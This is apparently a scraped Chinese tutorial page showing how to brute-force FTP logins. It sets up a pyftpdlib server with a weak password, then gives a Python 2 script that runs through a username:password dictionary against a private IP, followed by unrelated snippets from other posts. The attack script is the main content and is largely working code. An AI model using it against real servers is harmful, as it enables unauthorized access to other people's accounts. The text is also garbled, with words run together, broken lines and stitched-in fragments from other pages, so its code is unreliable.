//
/先啟動ftp服務
from pyftpdlib.handlers import ftphandler
from pyftpdlib.servers import ftpserver
from pyftpdlib.authorizers import dummyauthorizer
authorizer = dummyauthorizer(
)authorizer.add_user(
'python'
,'123456'
,'c:\\users\wxr'
,perm=
'elradfmwm'
)handler = ftphandler
handler.authorizer = authorizer
server = ftpserver(
('0.0.0.0'
,8888
), handler)
server.serve_forever()//
////
////
////
////
////
////
kali中新建乙個字典檔案userpass.txt
裡面羅列數個使用者名稱和密碼我們採用暴力破解方法
比如admin:
123456
然後kali中執行以下**
讀取上述檔案裡的使用者名稱和密碼乙個個試
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ftplib, time
defbrutelogin
(hostname, passwdfile)
: pf =
open
(passwdfile,
'r')
for line in pf.readlines():
username = line.split(
':')[0
] password = line.split(
':')[1
].strip(
)print
"[+] trying: "
+username+
"/"+password
try: ftp = ftplib.ftp(hostname)
ftp.login(username, password)
print
'\n[*] '
+str
(hostname)
+\ ' ftp logon succeeded: '
+username+
"/"+password
ftp.quit(
)return
(username, password)
except exception, e:
pass
print
'\n[-] could not brute force ftp credentials.'
return
(none
,none
)host =
'192.168.43.135'
passwdfile =
'userpass.txt'
brutelogin(host, passwdfile)
python 弱口令暴力破解工具
環境 python 3.6.7 coding utf 8 import pymysql success false f user open username.txt r f pwd open password.txt r lines user f user.readlines 讀取出來是乙個列表 l...
弱口令掃瞄 暴力破解密碼
在internet環境中,過於簡單的口令時伺服器面臨的最大風險。儘管大家都知道複雜的口令更安全,但仍然有很多使用者貪圖方便而採用簡單的口令。對於任何乙個承擔安全責任的管理員,及時找出這些弱口令賬戶時非常必要的 為保證linux伺服器平台的安全性,需要按照表2 1中加固項,對現網系統進行安全加固,防止...
用 swatch 搞定 ftp 暴力破解問題
為方便公司fans 的站長們上傳檔案,用了pureftp。pureftp表現確實不錯,不但穩定可靠,特徵豐富,而且在安全方面也很便於調控。維護人員挺擔心,希望盡快搞定這個問題。怎麼辦呢?pureftp本身的特徵似乎並不好解決暴力破解問題,後來想了想,決定用swatch來搞定。url 2.安裝 swa...